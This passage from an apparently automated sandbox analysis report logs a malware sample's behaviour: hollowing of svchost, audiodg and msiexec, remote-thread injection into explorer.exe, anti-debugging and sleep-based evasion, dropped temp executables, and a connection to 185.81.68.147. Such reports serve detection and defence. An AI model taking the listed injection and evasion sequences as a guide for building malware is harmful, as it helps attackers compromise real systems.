              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-1187
              Source: C:\Windows\System32\svchost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-1135
              Source: C:\Windows\explorer.exeAPI coverage: 6.7 %
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeAPI coverage: 1.8 %
              Source: C:\Windows\System32\audiodg.exe TID: 7664 Thread sleep time: -50000s >= -30000s
              Source: C:\Windows\System32\audiodg.exe TID: 7664 Thread sleep count: 281 > 30
              Source: C:\Windows\System32\audiodg.exe TID: 7664 Thread sleep time: -14050000s >= -30000s
              Source: C:\Windows\System32\audiodg.exe TID: 7704 Thread sleep count: 71 > 30
              Source: C:\Windows\System32\audiodg.exe TID: 7704 Thread sleep time: -191700s >= -30000s
              Source: C:\Windows\System32\audiodg.exe TID: 7720 Thread sleep count: 316 > 30
              Source: C:\Windows\System32\audiodg.exe TID: 7720 Thread sleep time: -1896000s >= -30000s
              Source: C:\Windows\System32\audiodg.exe TID: 7664 Thread sleep time: -50000s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 7672 Thread sleep count: 423 > 30
              Source: C:\Windows\System32\svchost.exe TID: 7672 Thread sleep time: -21150000s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 7792 Thread sleep count: 846 > 30
              Source: C:\Windows\System32\svchost.exe TID: 7792 Thread sleep time: -5076000s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 7672 Thread sleep time: -50000s >= -30000s
              Source: C:\Windows\System32\msiexec.exe TID: 7680 Thread sleep time: -50000s >= -30000s
              Source: C:\Windows\System32\msiexec.exe TID: 7680 Thread sleep count: 380 > 30
              Source: C:\Windows\System32\msiexec.exe TID: 7680 Thread sleep time: -19000000s >= -30000s
              Source: C:\Windows\System32\msiexec.exe TID: 7716 Thread sleep count: 53 > 30
              Source: C:\Windows\System32\msiexec.exe TID: 7716 Thread sleep time: -143100s >= -30000s
              Source: C:\Windows\System32\msiexec.exe TID: 7724 Thread sleep count: 368 > 30
              Source: C:\Windows\System32\msiexec.exe TID: 7724 Thread sleep time: -2208000s >= -30000s
              Source: C:\Windows\System32\msiexec.exe TID: 7680 Thread sleep time: -50000s >= -30000s
              Source: C:\Windows\explorer.exe TID: 7736 Thread sleep time: -3545400s >= -30000s
              Source: C:\Windows\explorer.exe TID: 7748 Thread sleep time: -2987750s >= -30000s
              Source: C:\Windows\explorer.exe TID: 7788 Thread sleep time: -68400s >= -30000s
              Source: C:\Windows\explorer.exe TID: 7732 Thread sleep time: -180000s >= -30000s
              Source: C:\Windows\explorer.exe TID: 7736 Thread sleep time: -1423100s >= -30000s
              Source: C:\Windows\explorer.exe TID: 7748 Thread sleep time: -1240700s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe TID: 6052 Thread sleep time: -8301034833169293s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe TID: 7880 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\System32\audiodg.exeLast function: Thread delayed
              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
              Source: C:\Windows\System32\msiexec.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F24F79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,12_2_00007FF7F24F79B0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F24F85A0 FindFirstFileExW,FindClose,12_2_00007FF7F24F85A0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F2510B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,12_2_00007FF7F2510B84
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F24F85A0 FindFirstFileExW,FindClose,13_2_00007FF7F24F85A0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F2510B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,13_2_00007FF7F2510B84
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F24F79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,13_2_00007FF7F24F79B0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB8F303C FindFirstFileExW,FindNextFileW,FindClose,13_2_00007FFBBB8F303C
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB8F3280 FindFirstFileExW,FindNextFileW,FindClose,13_2_00007FFBBB8F3280
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeCode function: 0_2_00007FF7E83C1444 GetSystemInfo,0_2_00007FF7E83C1444
              Source: C:\Windows\System32\audiodg.exe Thread delayed: delay time: 50000
              Source: C:\Windows\System32\svchost.exe Thread delayed: delay time: 50000
              Source: C:\Windows\System32\msiexec.exe Thread delayed: delay time: 50000
              Source: C:\Windows\explorer.exe Thread delayed: delay time: 90000
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeAPI call chain: ExitProcess graph end nodegraph_0-929
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeAPI call chain: ExitProcess graph end nodegraph_0-924
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeAPI call chain: ExitProcess graph end nodegraph_0-928
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeAPI call chain: ExitProcess graph end nodegraph_0-947
              Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_3-873
              Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_3-882
              Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_3-877
              Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_3-886
              Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_3-896
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeAPI call chain: ExitProcess graph end nodegraph_7-926
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeAPI call chain: ExitProcess graph end nodegraph_7-921
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeAPI call chain: ExitProcess graph end nodegraph_7-924
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeAPI call chain: ExitProcess graph end nodegraph_7-944
              Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end nodegraph_9-873
              Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end nodegraph_9-883
              Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end nodegraph_9-885
              Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end nodegraph_9-894
              Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_10-901
              Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_10-891
              Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_10-899
              Source: C:\Windows\System32\audiodg.exe Process information queried: ProcessInformation

              Anti Debugging

              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeCode function: 0_2_00007FF7E83C31AC IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent,0_2_00007FF7E83C31AC
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_7-1178
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_0-1182
              Source: C:\Windows\System32\audiodg.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_9-1127
              Source: C:\Windows\System32\svchost.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_3-1129
              Source: C:\Windows\System32\msiexec.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_10-1145
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe Process queried: DebugPort
              Source: C:\Windows\System32\audiodg.exe Process queried: DebugPort
              Source: C:\Windows\System32\svchost.exe Process queried: DebugPort
              Source: C:\Windows\System32\msiexec.exe Process queried: DebugPort
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe Process queried: DebugPort
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFC7DC4 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,5_2_0DFC7DC4
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFA8400 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,5_2_0DFA8400
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeCode function: 0_2_00007FF7E83C14EC LoadLibraryA,GetProcAddress,0_2_00007FF7E83C14EC
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeCode function: 0_2_00007FF7E83C2160 InternetOpenW,Sleep,InternetOpenUrlW,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,InternetCloseHandle,InternetCloseHandle,Sleep,InternetCloseHandle,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,GetProcessHeap,RtlAllocateHeap,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00007FF7E83C2160
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFD0340 SetUnhandledExceptionFilter,5_2_0DFD0340
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFC52F8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter,InitializeCriticalSectionEx,5_2_0DFC52F8
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F24FBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FF7F24FBBC0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F24FC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FF7F24FC44C
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F2509924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FF7F2509924
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F24FC62C SetUnhandledExceptionFilter,12_2_00007FF7F24FC62C
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F24FBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00007FF7F24FBBC0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F24FC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00007FF7F24FC44C
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F2509924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00007FF7F2509924
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F24FC62C SetUnhandledExceptionFilter,13_2_00007FF7F24FC62C
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB8F0F20 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00007FFBBB8F0F20
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB8CA184 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00007FFBBB8CA184
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBC31E5054 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00007FFBC31E5054
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBC31E4A34 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00007FFBC31E4A34
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBC31F6810 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00007FFBC31F6810
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBC31F5DF8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00007FFBC31F5DF8
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBC31F69F8 SetUnhandledExceptionFilter,13_2_00007FFBC31F69F8
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBC321D414 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00007FFBC321D414
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\explorer.exeFile created: F72F.tmp.ssg.exe.5.drJump to dropped file
              Source: C:\Windows\explorer.exeNetwork Connect: 185.81.68.147 80Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF6EC840000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF67E6D0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF6345C0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF67E6D0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF6EC840000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF6345C0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF67E6D0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF6345C0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF6EC840000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeCode function: 0_2_00007FF7E83C24CC GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree,0_2_00007FF7E83C24CC
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFA9920 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,5_2_0DFA9920
              Source: C:\Windows\explorer.exeCode function: 5_2_0E109920 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,5_2_0E109920
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF49920 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,5_2_0FF49920
              Source: C:\Windows\System32\audiodg.exeThread created: C:\Windows\explorer.exe EIP: DED0000Jump to behavior
              Source: C:\Windows\System32\svchost.exeThread created: C:\Windows\explorer.exe EIP: 8220000Jump to behavior
              Source: C:\Windows\System32\msiexec.exeThread created: C:\Windows\explorer.exe EIP: E080000Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeNtUnmapViewOfSection: Indirect: 0x7FF7E83C2860Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeNtUnmapViewOfSection: Indirect: 0x7FF6C5DB2860Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC840000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D0000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6345C0000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\System32\audiodg.exeMemory written: C:\Windows\explorer.exe base: DED0535 value starts with: 4D5AJump to behavior
              Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\explorer.exe base: 8220535 value starts with: 4D5AJump to behavior
              Source: C:\Windows\System32\msiexec.exeMemory written: C:\Windows\explorer.exe base: E080535 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D0000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC840000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6345C0000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D0000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6345C0000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6EC840000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\System32\audiodg.exeMemory written: PID: 4084 base: DED0000 value: 40Jump to behavior
              Source: C:\Windows\System32\audiodg.exeMemory written: PID: 4084 base: DED0535 value: 4DJump to behavior
              Source: C:\Windows\System32\svchost.exeMemory written: PID: 4084 base: 8220000 value: 40Jump to behavior
              Source: C:\Windows\System32\svchost.exeMemory written: PID: 4084 base: 8220535 value: 4DJump to behavior
              Source: C:\Windows\System32\msiexec.exeMemory written: PID: 4084 base: E080000 value: 40Jump to behavior
              Source: C:\Windows\System32\msiexec.exeMemory written: PID: 4084 base: E080535 value: 4DJump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeThread register set: target process: 7660Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeThread register set: target process: 7668Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeThread register set: target process: 7676Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeThread register set: target process: 7956Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeThread register set: target process: 7968Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeThread register set: target process: 7976Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeThread register set: target process: 7280Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeThread register set: target process: 7324Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeThread register set: target process: 7308Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF6EC840000Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF67E6D0000Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF6345C0000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF67E6D0000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF6EC840000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF6345C0000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF67E6D0000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF6345C0000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF6EC840000Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeProcess created: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
              Source: explorer.exe, 00000005.00000000.1416909270.00000000044D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1414659033.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.2673444234.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000005.00000000.1414659033.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.2673444234.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.2672592892.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
              Source: explorer.exe, 00000005.00000000.1414659033.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.2673444234.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
              Source: explorer.exe, 00000005.00000000.1414659033.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.2673444234.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: explorer.exe, 00000005.00000002.2682385928.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1420653874.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2159103753.000000000936E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd]1Q
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFC17DC cpuid 5_2_0DFC17DC
              Source: C:\Windows\explorer.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,5_2_0DFCA5F0
              Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,5_2_0DFC8520
              Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,5_2_0DFCA4EC
              Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,5_2_0DFCA438
              Source: C:\Windows\explorer.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx,5_2_0DFC9FCC
              Source: C:\Windows\explorer.exeCode function: _getptd,__lc_wcstolc,__get_qualified_locale,__lc_lctowcs,GetLocaleInfoEx,GetACP,5_2_0DFC2EAC
              Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,5_2_0DFC0EA8
              Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,5_2_0DFC80F0
